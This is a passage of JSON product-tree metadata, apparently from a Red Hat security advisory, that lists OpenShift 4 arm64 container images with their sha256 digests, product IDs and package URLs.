"product_id": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:00f27b950067e2221e7ec3d2b050939239d5521352a2496e152092d043588190_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-samples-rhel9-operator@sha256%3A00f27b950067e2221e7ec3d2b050939239d5521352a2496e152092d043588190?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848423"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:01dcdeb5283cdeb0ddba574048f39ef56f2a2f548efffffd3984bbf29d20cd81_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:01dcdeb5283cdeb0ddba574048f39ef56f2a2f548efffffd3984bbf29d20cd81_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:01dcdeb5283cdeb0ddba574048f39ef56f2a2f548efffffd3984bbf29d20cd81_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-update-keys-rhel9@sha256%3A01dcdeb5283cdeb0ddba574048f39ef56f2a2f548efffffd3984bbf29d20cd81?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848908"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:64d0b8bb7edbe154290b673c995576311b6d0afa28c43503788796c5f7e6451e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:64d0b8bb7edbe154290b673c995576311b6d0afa28c43503788796c5f7e6451e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:64d0b8bb7edbe154290b673c995576311b6d0afa28c43503788796c5f7e6451e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-container-networking-plugins-rhel9@sha256%3A64d0b8bb7edbe154290b673c995576311b6d0afa28c43503788796c5f7e6451e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845695"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:db5a00fe20fb9b52f0a5e01bd5462d1db5725c4b91354ee38d70fc32f6330191_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:db5a00fe20fb9b52f0a5e01bd5462d1db5725c4b91354ee38d70fc32f6330191_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:db5a00fe20fb9b52f0a5e01bd5462d1db5725c4b91354ee38d70fc32f6330191_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-resizer-rhel9@sha256%3Adb5a00fe20fb9b52f0a5e01bd5462d1db5725c4b91354ee38d70fc32f6330191?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844470"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:ae8f624c43ae3af3011158c8f646d1055d5042f2b9e0314611c84a6a1eed1bac_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:ae8f624c43ae3af3011158c8f646d1055d5042f2b9e0314611c84a6a1eed1bac_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:ae8f624c43ae3af3011158c8f646d1055d5042f2b9e0314611c84a6a1eed1bac_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshotter-rhel9@sha256%3Aae8f624c43ae3af3011158c8f646d1055d5042f2b9e0314611c84a6a1eed1bac?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849297"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:e13bbf95fdfd5a8f1ae64cb7f0c06ea5773d7f133584c4488d4d4b2411b36bbd_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:e13bbf95fdfd5a8f1ae64cb7f0c06ea5773d7f133584c4488d4d4b2411b36bbd_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:e13bbf95fdfd5a8f1ae64cb7f0c06ea5773d7f133584c4488d4d4b2411b36bbd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-snapshot-controller-rhel9@sha256%3Ae13bbf95fdfd5a8f1ae64cb7f0c06ea5773d7f133584c4488d4d4b2411b36bbd?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848645"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:c17093b12e451052d0b50b93e4f165608cc0f32fa2813c703756c66805e5912b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:c17093b12e451052d0b50b93e4f165608cc0f32fa2813c703756c66805e5912b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:c17093b12e451052d0b50b93e4f165608cc0f32fa2813c703756c66805e5912b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-etcd-rhel9@sha256%3Ac17093b12e451052d0b50b93e4f165608cc0f32fa2813c703756c66805e5912b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849791"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:431d1f322a4f0234798ba728670ada359bc7671ce4f297907c0c8fcef3f0a881_arm64",
"product": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:431d1f322a4f0234798ba728670ada359bc7671ce4f297907c0c8fcef3f0a881_arm64",
"product_id": "registry.redhat.io/openshift4/frr-rhel9@sha256:431d1f322a4f0234798ba728670ada359bc7671ce4f297907c0c8fcef3f0a881_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/frr-rhel9@sha256%3A431d1f322a4f0234798ba728670ada359bc7671ce4f297907c0c8fcef3f0a881?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848367"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:4bb9e672922e50ec937868aad492e319d40d7c24a247650f2d39fe2ab5f4c6db_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:4bb9e672922e50ec937868aad492e319d40d7c24a247650f2d39fe2ab5f4c6db_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:4bb9e672922e50ec937868aad492e319d40d7c24a247650f2d39fe2ab5f4c6db_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cloud-controller-manager-rhel9@sha256%3A4bb9e672922e50ec937868aad492e319d40d7c24a247650f2d39fe2ab5f4c6db?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847086"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:9f76b703dd3bda6e39fee67990cbf7f18ca3856b51610ecd8e3355e435af9863_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:9f76b703dd3bda6e39fee67990cbf7f18ca3856b51610ecd8e3355e435af9863_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:9f76b703dd3bda6e39fee67990cbf7f18ca3856b51610ecd8e3355e435af9863_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cluster-api-controllers-rhel9@sha256%3A9f76b703dd3bda6e39fee67990cbf7f18ca3856b51610ecd8e3355e435af9863?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847617"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:82c80097ae5a60ac10a19d486cba96bc72e5b799350e925a459ae0bb37cc22b3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:82c80097ae5a60ac10a19d486cba96bc72e5b799350e925a459ae0bb37cc22b3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:82c80097ae5a60ac10a19d486cba96bc72e5b799350e925a459ae0bb37cc22b3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-rhel9@sha256%3A82c80097ae5a60ac10a19d486cba96bc72e5b799350e925a459ae0bb37cc22b3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847840"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:a023bca30051596776daab0263ddb617d2a13dabc46de5c97f123b253fbf3d29_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:a023bca30051596776daab0263ddb617d2a13dabc46de5c97f123b253fbf3d29_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:a023bca30051596776daab0263ddb617d2a13dabc46de5c97f123b253fbf3d29_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-operator-rhel9@sha256%3Aa023bca30051596776daab0263ddb617d2a13dabc46de5c97f123b253fbf3d29?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845937"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4ea870b393120ff9a209eb91c1694ab03e340cd92e0bf45574a386bd715ab1af_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4ea870b393120ff9a209eb91c1694ab03e340cd92e0bf45574a386bd715ab1af_arm64",
"product_id": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4ea870b393120ff9a209eb91c1694ab03e340cd92e0bf45574a386bd715ab1af_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-image-customization-controller-rhel9@sha256%3A4ea870b393120ff9a209eb91c1694ab03e340cd92e0bf45574a386bd715ab1af?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844628"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:94b8f7046824d7fc258908303d0dd7dea98dffdb71da75473741701d5630fd43_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:94b8f7046824d7fc258908303d0dd7dea98dffdb71da75473741701d5630fd43_arm64",
"product_id": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:94b8f7046824d7fc258908303d0dd7dea98dffdb71da75473741701d5630fd43_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-insights-rhel9-operator@sha256%3A94b8f7046824d7fc258908303d0dd7dea98dffdb71da75473741701d5630fd43?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845624"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:79fa1f3a57e1db94048a410727dd6bacd4683e1a54bf699d3dd318a84a9ed45b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:79fa1f3a57e1db94048a410727dd6bacd4683e1a54bf699d3dd318a84a9ed45b_arm64",
"product_id": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:79fa1f3a57e1db94048a410727dd6bacd4683e1a54bf699d3dd318a84a9ed45b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-exporter-rhel9@sha256%3A79fa1f3a57e1db94048a410727dd6bacd4683e1a54bf699d3dd318a84a9ed45b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847882"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:9650cffbe1a64468fef27a62a960b67059d0d6ed59e2ef09c7900d29133c0864_arm64",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:9650cffbe1a64468fef27a62a960b67059d0d6ed59e2ef09c7900d29133c0864_arm64",
"product_id": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:9650cffbe1a64468fef27a62a960b67059d0d6ed59e2ef09c7900d29133c0864_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-extractor-rhel9@sha256%3A9650cffbe1a64468fef27a62a960b67059d0d6ed59e2ef09c7900d29133c0864?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848023"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:257e4cd3d8aca92de36e31ffefb6e9b286c602a32ae1c3f63e4fc59cbd1e4291_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:257e4cd3d8aca92de36e31ffefb6e9b286c602a32ae1c3f63e4fc59cbd1e4291_arm64",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:257e4cd3d8aca92de36e31ffefb6e9b286c602a32ae1c3f63e4fc59cbd1e4291_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3A257e4cd3d8aca92de36e31ffefb6e9b286c602a32ae1c3f63e4fc59cbd1e4291?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851387"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:303710848cd4644e4235da51f011840fae00d5b30df2f55cad1fe3bb91c0ce41_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:303710848cd4644e4235da51f011840fae00d5b30df2f55cad1fe3bb91c0ce41_arm64",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:303710848cd4644e4235da51f011840fae00d5b30df2f55cad1fe3bb91c0ce41_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3A303710848cd4644e4235da51f011840fae00d5b30df2f55cad1fe3bb91c0ce41?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851359"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:37c8160b545194fe3a91940a9fc8911383fd3674dcbc3135454b6872b04d7c42_arm64",
"product": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:37c8160b545194fe3a91940a9fc8911383fd3674dcbc3135454b6872b04d7c42_arm64",
"product_id": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:37c8160b545194fe3a91940a9fc8911383fd3674dcbc3135454b6872b04d7c42_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kube-metrics-server-rhel9@sha256%3A37c8160b545194fe3a91940a9fc8911383fd3674dcbc3135454b6872b04d7c42?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773845477"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:a5c0bd42f2ffe7c2d87f8c5ecb5910a64bb63bdceac83669cb38b5180907e052_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:a5c0bd42f2ffe7c2d87f8c5ecb5910a64bb63bdceac83669cb38b5180907e052_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:a5c0bd42f2ffe7c2d87f8c5ecb5910a64bb63bdceac83669cb38b5180907e052_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-storage-version-migrator-rhel9@sha256%3Aa5c0bd42f2ffe7c2d87f8c5ecb5910a64bb63bdceac83669cb38b5180907e052?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849586"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:0b83daa834cf9df259d8fd475c2678d92c6dd44ed697a96c24ac8921a972b58f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:0b83daa834cf9df259d8fd475c2678d92c6dd44ed697a96c24ac8921a972b58f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:0b83daa834cf9df259d8fd475c2678d92c6dd44ed697a96c24ac8921a972b58f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kubevirt-cloud-controller-manager-rhel9@sha256%3A0b83daa834cf9df259d8fd475c2678d92c6dd44ed697a96c24ac8921a972b58f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848525"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:934795c45d33ed58aa148aca6a165a4f38ec9ce88413ed62404da19627e4c465_arm64",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:934795c45d33ed58aa148aca6a165a4f38ec9ce88413ed62404da19627e4c465_arm64",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:934795c45d33ed58aa148aca6a165a4f38ec9ce88413ed62404da19627e4c465_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3A934795c45d33ed58aa148aca6a165a4f38ec9ce88413ed62404da19627e4c465?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848335"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:5d3761ab41937e14fd4b1bd4d93e01d3fc234552c14dd4a36026afe2a656229c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:5d3761ab41937e14fd4b1bd4d93e01d3fc234552c14dd4a36026afe2a656229c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:5d3761ab41937e14fd4b1bd4d93e01d3fc234552c14dd4a36026afe2a656229c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-libvirt-machine-controllers-rhel9@sha256%3A5d3761ab41937e14fd4b1bd4d93e01d3fc234552c14dd4a36026afe2a656229c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a98950f3880fe0bd22db370def7b4e5cc596efcc1e50e82ff983d59deebcbc87_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a98950f3880fe0bd22db370def7b4e5cc596efcc1e50e82ff983d59deebcbc87_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a98950f3880fe0bd22db370def7b4e5cc596efcc1e50e82ff983d59deebcbc87_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-rhel9-operator@sha256%3Aa98950f3880fe0bd22db370def7b4e5cc596efcc1e50e82ff983d59deebcbc87?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844528"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:795541dbfc7bb3bda387c4f1647233c0f1ace2abcf3e74d99c4ce6f48abc7edc_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:795541dbfc7bb3bda387c4f1647233c0f1ace2abcf3e74d99c4ce6f48abc7edc_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:795541dbfc7bb3bda387c4f1647233c0f1ace2abcf3e74d99c4ce6f48abc7edc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-aws-rhel9@sha256%3A795541dbfc7bb3bda387c4f1647233c0f1ace2abcf3e74d99c4ce6f48abc7edc?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:2e237915caa1fc0afa9af6fecd82ba8820da8a624e1408f7a4cf4eca9e0143b9_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:2e237915caa1fc0afa9af6fecd82ba8820da8a624e1408f7a4cf4eca9e0143b9_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:2e237915caa1fc0afa9af6fecd82ba8820da8a624e1408f7a4cf4eca9e0143b9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-azure-rhel9@sha256%3A2e237915caa1fc0afa9af6fecd82ba8820da8a624e1408f7a4cf4eca9e0143b9?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844581"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:8fbf341238b95948d702ad7a7909113c4eb5d670f06d4d3be3cb6a6f6594c05e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:8fbf341238b95948d702ad7a7909113c4eb5d670f06d4d3be3cb6a6f6594c05e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:8fbf341238b95948d702ad7a7909113c4eb5d670f06d4d3be3cb6a6f6594c05e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-gcp-rhel9@sha256%3A8fbf341238b95948d702ad7a7909113c4eb5d670f06d4d3be3cb6a6f6594c05e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847371"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:1e7f9f39328a9e5c080ba7e18a7a1c17a179c36816d4394d8f1aa8e38cd0d889_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:1e7f9f39328a9e5c080ba7e18a7a1c17a179c36816d4394d8f1aa8e38cd0d889_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:1e7f9f39328a9e5c080ba7e18a7a1c17a179c36816d4394d8f1aa8e38cd0d889_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-openstack-rhel9@sha256%3A1e7f9f39328a9e5c080ba7e18a7a1c17a179c36816d4394d8f1aa8e38cd0d889?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848305"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:3795c200441089d373eaf98d9c1d3e1f4769c46bf0d8b8ac71e2f9eb2e5e3006_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:3795c200441089d373eaf98d9c1d3e1f4769c46bf0d8b8ac71e2f9eb2e5e3006_arm64",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:3795c200441089d373eaf98d9c1d3e1f4769c46bf0d8b8ac71e2f9eb2e5e3006_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3A3795c200441089d373eaf98d9c1d3e1f4769c46bf0d8b8ac71e2f9eb2e5e3006?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773860329"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb7894f06fee976d9c964bfec6eb72ed16fa9309de40508610fb2e031cd86035_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb7894f06fee976d9c964bfec6eb72ed16fa9309de40508610fb2e031cd86035_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb7894f06fee976d9c964bfec6eb72ed16fa9309de40508610fb2e031cd86035_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-admission-controller-rhel9@sha256%3Afb7894f06fee976d9c964bfec6eb72ed16fa9309de40508610fb2e031cd86035?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847693"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:ea60b96bc780faa5904ab8ccffc93154ea5a015c6b367e0c265032d867d362cd_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:ea60b96bc780faa5904ab8ccffc93154ea5a015c6b367e0c265032d867d362cd_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:ea60b96bc780faa5904ab8ccffc93154ea5a015c6b367e0c265032d867d362cd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-route-override-cni-rhel9@sha256%3Aea60b96bc780faa5904ab8ccffc93154ea5a015c6b367e0c265032d867d362cd?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846709"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:afe0287c049d7aeaf14cf70f515637e31ddc553c8c2dc285f05fb6fcadd45a3b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:afe0287c049d7aeaf14cf70f515637e31ddc553c8c2dc285f05fb6fcadd45a3b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:afe0287c049d7aeaf14cf70f515637e31ddc553c8c2dc285f05fb6fcadd45a3b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-whereabouts-ipam-cni-rhel9@sha256%3Aafe0287c049d7aeaf14cf70f515637e31ddc553c8c2dc285f05fb6fcadd45a3b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846291"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:939f3334417609fa2a140629d6bc3ab13cc99128da92b32c5b437820422875b0_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:939f3334417609fa2a140629d6bc3ab13cc99128da92b32c5b437820422875b0_arm64",
"product_id": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:939f3334417609fa2a140629d6bc3ab13cc99128da92b32c5b437820422875b0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-must-gather-rhel9@sha256%3A939f3334417609fa2a140629d6bc3ab13cc99128da92b32c5b437820422875b0?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773851203"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:6961835f3eac4677fd6738bf0b02fc6f4742e1f9de0654b44be7a56646317625_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:6961835f3eac4677fd6738bf0b02fc6f4742e1f9de0654b44be7a56646317625_arm64",
"product_id": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:6961835f3eac4677fd6738bf0b02fc6f4742e1f9de0654b44be7a56646317625_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-interface-bond-cni-rhel9@sha256%3A6961835f3eac4677fd6738bf0b02fc6f4742e1f9de0654b44be7a56646317625?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844493"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e93849c65903929172f7ee0639d477ec569297cc5b8210550ad973c7b5a46685_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e93849c65903929172f7ee0639d477ec569297cc5b8210550ad973c7b5a46685_arm64",
"product_id": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e93849c65903929172f7ee0639d477ec569297cc5b8210550ad973c7b5a46685_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-metrics-daemon-rhel9@sha256%3Ae93849c65903929172f7ee0639d477ec569297cc5b8210550ad973c7b5a46685?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844925"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:68fbb392a2e08a7c32f0bcfa78b1e4aacb67df3cae696160d7946013d97d54b7_arm64",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:68fbb392a2e08a7c32f0bcfa78b1e4aacb67df3cae696160d7946013d97d54b7_arm64",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:68fbb392a2e08a7c32f0bcfa78b1e4aacb67df3cae696160d7946013d97d54b7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3A68fbb392a2e08a7c32f0bcfa78b1e4aacb67df3cae696160d7946013d97d54b7?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773737444"
}
}
},
{
"category": "product_version",
